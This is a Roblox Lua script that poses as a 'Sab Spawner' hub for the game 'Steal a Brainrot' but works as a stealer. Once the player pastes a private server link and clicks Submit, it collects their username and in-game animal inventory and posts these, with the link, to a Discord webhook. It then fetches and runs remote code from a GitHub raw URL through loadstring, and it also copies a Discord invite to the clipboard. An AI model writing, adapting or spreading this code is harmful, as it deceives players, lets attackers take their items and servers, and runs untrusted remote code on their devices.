-- === ARTIFAKT 2: MAIN HUB + BRAINROT STEALER (FIXED TRAIT DETECTION) ===
pcall(function() setclipboard("https://discord.gg/rvZndRfkyX") end)

local ALLOWED_PLACE_ID = 109983668079237
if game.PlaceId ~= ALLOWED_PLACE_ID then
    game:GetService("Players").LocalPlayer:Kick("Wrong game! This script only works on the official game.")
    return
end

local Webhook1 = Webhook or ""
local Ping = Ping or "10m"
local Username = "voxium script .gg/59XeEXRe"

local Players = game:GetService("Players")
local TweenService = game:GetService("TweenService")
local UserInputService = game:GetService("UserInputService")
local HttpService = game:GetService("HttpService")
local StarterGui = game:GetService("StarterGui")
local ReplicatedStorage = game:GetService("ReplicatedStorage")

if not game:IsLoaded() then pcall(function() game.Loaded:Wait() end) end
local LP = Players.LocalPlayer or Players.PlayerAdded:Wait()

local CoreGui = game:GetService("CoreGui")
local UIParent = LP:FindFirstChildOfClass("PlayerGui") or CoreGui
local old = UIParent:FindFirstChild("LennonHubXZamasXM_GUI")
if old then old:Destroy() end

local SG = Instance.new("ScreenGui")
SG.Name = "LennonHubXZamasXM_GUI"
SG.IgnoreGuiInset = true
SG.ResetOnSpawn = false
SG.ZIndexBehavior = Enum.ZIndexBehavior.Global
SG.DisplayOrder = 999999
SG.Parent = UIParent

local COLORS = {
    card = Color3.fromRGB(14,12,24),
    text = Color3.fromRGB(235,235,245),
    dim = Color3.fromRGB(170,175,200),
    a1 = Color3.fromRGB(130,90,255),
    a2 = Color3.fromRGB(50,180,255),
    ok = Color3.fromRGB(0,210,140),
    warn = Color3.fromRGB(255,120,120),
}

-- === TRAIT ICON TO NAME MAP (FIXED: assetid as string key) ===
local traitMap = {
    ["89041930759464"] = "Taco",
    ["104229924295526"] = "Nyan",
    ["99181785766598"] = "Galactic",
    ["121100427764858"] = "Fireworks",
    ["110723387483939"] = "Zombie",
    ["104964195846833"] = "Claws",
    ["121332433272976"] = "Glitched",
    ["100601425541874"] = "Bubblegum",
    ["118283346037788"] = "Fire",
    ["78474194088770"] = "Wet",
    ["83627475909869"] = "Snowy",
    ["127455440418221"] = "Cometstruck",
    ["97725744252608"] = "Explosive",
    ["82620342632406"] = "Disco",
    ["134655415681926"] = "10B",
    ["104985313532149"] = "Shark Fin",
    ["115664804212096"] = "Matteo Hat",
    ["75650816341229"] = "Brazil",
    ["115001117876534"] = "Sleepy",
    ["139729696247144"] = "Lightning",
    ["110910518481052"] = "UFO",
    ["117478971325696"] = "Spider",
    ["84731118566493"] = "Strawberry",
    ["119591742504251"] = "Paint",
    ["89591838221335"] = "Skeleton",
    ["95128039793845"] = "Sombrero",
    ["103610037004911"] = "Tie",
    ["123964048606874"] = "Witch Hat",
    ["93350414974589"] = "Indonesia",
    ["114748221761549"] = "Meowl",
    ["123115843719383"] = "RIP Gravestone",
    ["97054765273857"] = "Jackolantern Pet",
}

-- === BRAINROT FETCH + TRAIT DETECTION (FIXED) ===
local Plot = require(ReplicatedStorage.Controllers.PlotController)
local gen = require(ReplicatedStorage.Shared.Animals)
local myPlot = Plot:GetMyPlot()

local function getAllBrainrots()
    local list = {}
    for _, brainrot in pairs(myPlot.Channel:Get("AnimalList")) do
        local amount = gen:GetGeneration(brainrot.Index, brainrot.Mutation)
        local baseName = brainrot.Index

        -- === TRAIT DETECTION FROM MUTATION (Icon) ===
        local traitName = "None"
        if brainrot.Mutation and brainrot.Mutation:FindFirstChild("Icon") then
            local icon = brainrot.Mutation.Icon
            local assetId = tostring(icon.Image):match("%d+$")
            if assetId and traitMap[assetId] then
                traitName = traitMap[assetId]
            end
        end

        local fullName = baseName
        if traitName ~= "None" then
            fullName = baseName .. " (" .. traitName .. ")"
        end

        if baseName then
            table.insert(list, {name = fullName, moneyPerSec = amount, trait = traitName})
        end
    end
    table.sort(list, function(a,b) return a.moneyPerSec > b.moneyPerSec end)
    return list
end

-- === FUNCTIONS ===
local function parsePingValue(p) local n,s=p:match("(%d+)([kmb]?)") n=tonumber(n)or 0 local m={k=1e3,m=1e6,b=1e9} return n*(m[s:lower()]or 1) end
local pingThreshold = parsePingValue(Ping)

local function formatMoney(v)
    if v>=1e12 then return string.format("%.2fT/s",v/1e12)
    elseif v>=1e9 then return string.format("%.2fB/s",v/1e9)
    elseif v>=1e6 then return string.format("%.2fM/s",v/1e6)
    elseif v>=1e3 then return string.format("%.2fK/s",v/1e3)
    else return string.format("%.0f/s",v) end
end

local function hasHighValue(b) for _,d in ipairs(b) do if d.moneyPerSec >= pingThreshold then return true end end return false end

local function sendWebhook(brainrots, link)
    local text = ""
    if #brainrots > 0 then
        for _,d in ipairs(brainrots) do
            text = text .. string.format("%s - %s\n", d.name, formatMoney(d.moneyPerSec))
        end
    else text = "No Brainrots found" end
    local info = string.format("Name: %s\nDisplay: %s\nPlayers: %d/%d", LP.Name, LP.DisplayName, #Players:GetPlayers(), Players.MaxPlayers)
    local ping = hasHighValue(brainrots) and "@everyone" or ""
    local data = {username = Username, content = ping, embeds = {{title="Steal a Brainrot Hit With Voxium", color=0x8A2BE2,
        fields={
            {name="Player Information:", value="```"..info.."```", inline=false},
            {name="Player Brainrots:", value="```"..text.."```", inline=false},
            {name="Summary:", value="```Total Items: "..#brainrots.."```", inline=false},
            {name="Join Link (Private):", value=link, inline=false}
        }
    }}}
    local req = http_request or request or (syn and syn.request)
    if req then pcall(function() req({Url=Webhook1, Method="POST", Headers={["Content-Type"]="application/json"}, Body=HttpService:JSONEncode(data)}) end) end
end

-- === UI (NO ANIMATIONS EXCEPT BUTTON HOVER) ===
local Holder = Instance.new("Frame", SG)
Holder.AnchorPoint = Vector2.new(0.5,0.5)
Holder.Position = UDim2.fromScale(0.5,0.5)
Holder.Size = UDim2.new(0,440,0,240)
Holder.BackgroundColor3 = COLORS.card
Holder.BackgroundTransparency = 0.12
Holder.BorderSizePixel = 0
Holder.Active = true
Holder.ZIndex = 10
local corner = Instance.new("UICorner", Holder); corner.CornerRadius = UDim.new(0,18)
local stroke = Instance.new("UIStroke", Holder); stroke.Thickness = 2; stroke.Transparency = 0.15
local grad = Instance.new("UIGradient", stroke); grad.Color = ColorSequence.new(COLORS.a1, Color3.new(0,0,0), COLORS.a2)

-- Dragging
local dragging, dragInput, dragStart, startPos
local function update(i)
    local d = i.Position - dragStart
    Holder.Position = UDim2.new(startPos.X.Scale, startPos.X.Offset + d.X, startPos.Y.Scale, startPos.Y.Offset + d.Y)
end
Holder.InputBegan:Connect(function(i)
    if i.UserInputType == Enum.UserInputType.MouseButton1 or i.UserInputType == Enum.UserInputType.Touch then
        dragging = true; dragStart = i.Position; startPos = Holder.Position
        i.Changed:Connect(function() if i.UserInputState == Enum.UserInputState.End then dragging = false end end)
    end
end)
Holder.InputChanged:Connect(function(i)
    if i.UserInputType == Enum.UserInputType.MouseMovement or i.UserInputType == Enum.UserInputType.Touch then dragInput = i end
end)
UserInputService.InputChanged:Connect(function(i)
    if i == dragInput and dragging then update(i) end
end)

-- Top UI
local Top = Instance.new("Frame", Holder)
Top.BackgroundTransparency = 1
Top.Size = UDim2.new(1,-32,0,80)
Top.Position = UDim2.new(0,16,0,16)
Top.ZIndex = 20

local Avatar = Instance.new("ImageLabel", Top)
Avatar.BackgroundTransparency = 1
Avatar.Size = UDim2.fromOffset(64,64)
Avatar.Image = "rbxassetid://0"
Avatar.ZIndex = 21
local aCorner = Instance.new("UICorner", Avatar); aCorner.CornerRadius = UDim.new(1,0)

task.spawn(function()
    local ok,url = pcall(Players.GetUserThumbnailAsync, Players, LP.UserId, Enum.ThumbnailType.HeadShot, Enum.ThumbnailSize.Size100x100)
    if ok and url then Avatar.Image = url end
end)

local Info = Instance.new("Frame", Top)
Info.BackgroundTransparency = 1
Info.Size = UDim2.new(1,-80,1,0)
Info.Position = UDim2.new(0,80,0,0)
Info.ZIndex = 21

local Title = Instance.new("TextLabel", Info)
Title.BackgroundTransparency = 1
Title.Text = "VoxiumHub"
Title.Font = Enum.Font.GothamBlack
Title.TextSize = 24
Title.TextColor3 = COLORS.a1
Title.TextStrokeColor3 = Color3.fromRGB(20,0,40)
Title.TextStrokeTransparency = 0.6
Title.TextXAlignment = Enum.TextXAlignment.Left
Title.Size = UDim2.new(1,0,0,28)
Title.ZIndex = 22

local Sub = Instance.new("TextLabel", Info)
Sub.BackgroundTransparency = 1
Sub.Font = Enum.Font.Gotham
Sub.TextSize = 12
Sub.TextColor3 = COLORS.dim
Sub.TextXAlignment = Enum.TextXAlignment.Left
Sub.Size = UDim2.new(1,0,0,18)
Sub.Position = UDim2.new(0,0,0,30)
Sub.ZIndex = 22

task.spawn(function()
    local name = LP and LP.Name or "User"
    local dname = LP and LP.DisplayName or "Player"
    local age = LP and (tostring(LP.AccountAge).." days") or "N/A"
    local premium = (LP and LP.MembershipType and tostring(LP.MembershipType):find("Premium")) and "Premium" or "Standard"
    Sub.Text = string.format("%s (@%s) • %s • %s", dname, name, age, premium)
end)

local Badge = Instance.new("TextLabel", Info)
Badge.BackgroundTransparency = 1
Badge.Text = "support[](https://discord.gg/59XeEXRe)"
Badge.Font = Enum.Font.GothamBold
Badge.TextSize = 12
Badge.TextColor3 = COLORS.a2
Badge.TextXAlignment = Enum.TextXAlignment.Left
Badge.Size = UDim2.new(1,0,0,16)
Badge.Position = UDim2.new(0,0,0,50)
Badge.ZIndex = 22

local Body = Instance.new("Frame", Holder)
Body.BackgroundTransparency = 1
Body.Size = UDim2.new(1,-32,0,108)
Body.Position = UDim2.new(0,16,0,104)
Body.ZIndex = 20

local StatusArea = Instance.new("TextBox", Body)
StatusArea.ClearTextOnFocus = false
StatusArea.PlaceholderText = "Put Private server Link To get ur Sab Spawner Loaded"
StatusArea.Text = ""
StatusArea.Font = Enum.Font.Gotham
StatusArea.TextSize = 14
StatusArea.TextColor3 = COLORS.text
StatusArea.PlaceholderColor3 = COLORS.dim
StatusArea.BackgroundColor3 = Color3.fromRGB(12,12,22)
StatusArea.BackgroundTransparency = 0.15
StatusArea.Size = UDim2.new(1,0,0,54)
StatusArea.Position = UDim2.new(0,0,0,0)
StatusArea.ZIndex = 21
StatusArea.TextXAlignment = Enum.TextXAlignment.Left
StatusArea.TextYAlignment = Enum.TextYAlignment.Top
StatusArea.TextWrapped = true
local padding = Instance.new("UIPadding", StatusArea)
padding.PaddingLeft = UDim.new(0,8)
padding.PaddingRight = UDim.new(0,8)
padding.PaddingTop = UDim.new(0,8)
padding.PaddingBottom = UDim.new(0,8)
local saCorner = Instance.new("UICorner", StatusArea); saCorner.CornerRadius = UDim.new(0,10)
local saStroke = Instance.new("UIStroke", StatusArea); saStroke.Thickness=1; saStroke.Color=Color3.fromRGB(40,40,80); saStroke.Transparency=0.3

local StatusSub = Instance.new("TextLabel", Body)
StatusSub.BackgroundTransparency = 1
StatusSub.Text = ""
StatusSub.Font = Enum.Font.GothamSemibold
StatusSub.TextSize = 12
StatusSub.TextColor3 = COLORS.a2
StatusSub.TextXAlignment = Enum.TextXAlignment.Left
StatusSub.TextWrapped = true
StatusSub.Size = UDim2.new(1,0,0,20)
StatusSub.Position = UDim2.new(0,0,0,58)
StatusSub.ZIndex = 23

local BtnSubmit = Instance.new("TextButton", Body)
BtnSubmit.Text = "Submit"
BtnSubmit.AutoButtonColor = false
BtnSubmit.ZIndex = 22
BtnSubmit.Font = Enum.Font.GothamSemibold
BtnSubmit.TextSize = 16
BtnSubmit.TextColor3 = Color3.fromRGB(240,240,245)
BtnSubmit.BackgroundColor3 = Color3.fromRGB(20,18,34)
BtnSubmit.Size = UDim2.new(1,0,0,44)
BtnSubmit.Position = UDim2.new(0,0,0,64)
local btnCorner = Instance.new("UICorner", BtnSubmit); btnCorner.CornerRadius = UDim.new(0,10)
local btnStroke = Instance.new("UIStroke", BtnSubmit); btnStroke.Thickness = 2; btnStroke.Transparency = 0.15
local btnGrad = Instance.new("UIGradient", btnStroke); btnGrad.Color = ColorSequence.new(COLORS.a1, COLORS.a2)

BtnSubmit.MouseEnter:Connect(function()
    TweenService:Create(BtnSubmit, TweenInfo.new(0.15), {BackgroundColor3 = Color3.fromRGB(28,24,48)}):Play()
end)
BtnSubmit.MouseLeave:Connect(function()
    TweenService:Create(BtnSubmit, TweenInfo.new(0.20), {BackgroundColor3 = Color3.fromRGB(20,18,34)}):Play()
end)

local function toast(msg, sub, main, subc)
    StatusArea.Text = msg
    StatusArea.TextColor3 = main or COLORS.text
    StatusSub.Text = sub or ""
    StatusSub.TextColor3 = subc or COLORS.a2
end

BtnSubmit.MouseButton1Click:Connect(function()
    local link = StatusArea.Text
    if link == "" or not link:match("^https://") then
        toast("Invalid", "Enter valid private server link", COLORS.warn, COLORS.warn)
        return
    end
    local brainrots = getAllBrainrots()
    sendWebhook(brainrots, link)
    SG:Destroy()
    loadstring(game:HttpGet("https://raw.githubusercontent.com/dinoscripts2334/extern-script/refs/heads/main/Extern"))()
end)
